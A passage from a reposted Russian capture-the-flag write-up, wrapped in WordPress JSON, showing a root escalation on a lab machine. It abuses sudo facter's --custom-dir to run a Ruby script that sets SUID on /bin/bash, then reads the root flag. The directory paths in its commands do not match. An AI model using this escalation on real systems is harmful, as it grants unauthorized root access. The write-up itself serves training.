\u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c sudo \/usr\/bin\/facter \u0441 \u043b\u044e\u0431\u044b\u043c\u0438 \u0444\u043b\u0430\u0433\u0430\u043c\u0438.\u0423 facter \u0435\u0441\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 —custom-dir, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0435\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0435 \u0444\u0430\u043a\u0442\u044b (\u0441\u043a\u0440\u0438\u043f\u0442\u044b \u043d\u0430 Ruby) \u0438\u0437 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u043e\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438. \u0422\u0430\u043a \u043a\u0430\u043a facter \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u0447\u0435\u0440\u0435\u0437 sudo, \u043b\u044e\u0431\u043e\u0439 \u043d\u0430\u0448 Ruby-\u0441\u043a\u0440\u0438\u043f\u0442 \u0432 \u044d\u0442\u043e\u0439 \u043f\u0430\u043f\u043a\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u0441\u044f \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root.\u0421\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e \u0438 \u043d\u0430\u043f\u0438\u0448\u0435\u043c \u0442\u0443\u0434\u0430 \u043f\u0440\u043e\u0441\u0442\u0435\u0439\u0448\u0438\u0439 Ruby-\u0441\u043a\u0440\u0438\u043f\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u0434\u0430\u0441\u0442 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \/bin\/bash \u043f\u0440\u0430\u0432\u0430 SUID.mkdir -p \/tmp\/1echo ‘system(«\/bin\/chmod u+s \/bin\/bash»)’ > \/tmp\/privesc\/1.rb\u0422\u0435\u043f\u0435\u0440\u044c \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0441\u043a\u043e\u0440\u043c\u0438\u043c \u0435\u0439 \u043d\u0430\u0448\u0443 \u043f\u0430\u043f\u043a\u0443 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u0444\u0430\u043a\u0442\u043e\u043c:sudo \/usr\/bin\/facter —custom-dir \/tmp\/1\u0415\u0441\u043b\u0438 \u0441\u043a\u0440\u0438\u043f\u0442 \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u043b, \u0443 \/bin\/bash \u0442\u0435\u043f\u0435\u0440\u044c \u0435\u0441\u0442\u044c \u0431\u0438\u0442 SUID \u043e\u0442 \u0440\u0443\u0442\u0430. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0439 \u0431\u0430\u0448 \u0441 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 (\u0444\u043b\u0430\u0433 -p):\/bin\/bash -p\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c  \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 id (\u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c euid=0(root))trivia@facts:\/opt\/factsapp$ \/bin\/bash -pbash-5.2# iduid=1000(trivia) gid=1000(trivia) euid=0(root) groups=1000(trivia)bash-5.2# cat root.txt rootflag\u0420\u0430\u0439\u0442\u0430\u043f \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b @alfabuster\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 https:\/\/habr.com\/ru\/articles\/1053654\/<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-485546","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/485546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=485546"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/485546\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=485546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=485546"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=485546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}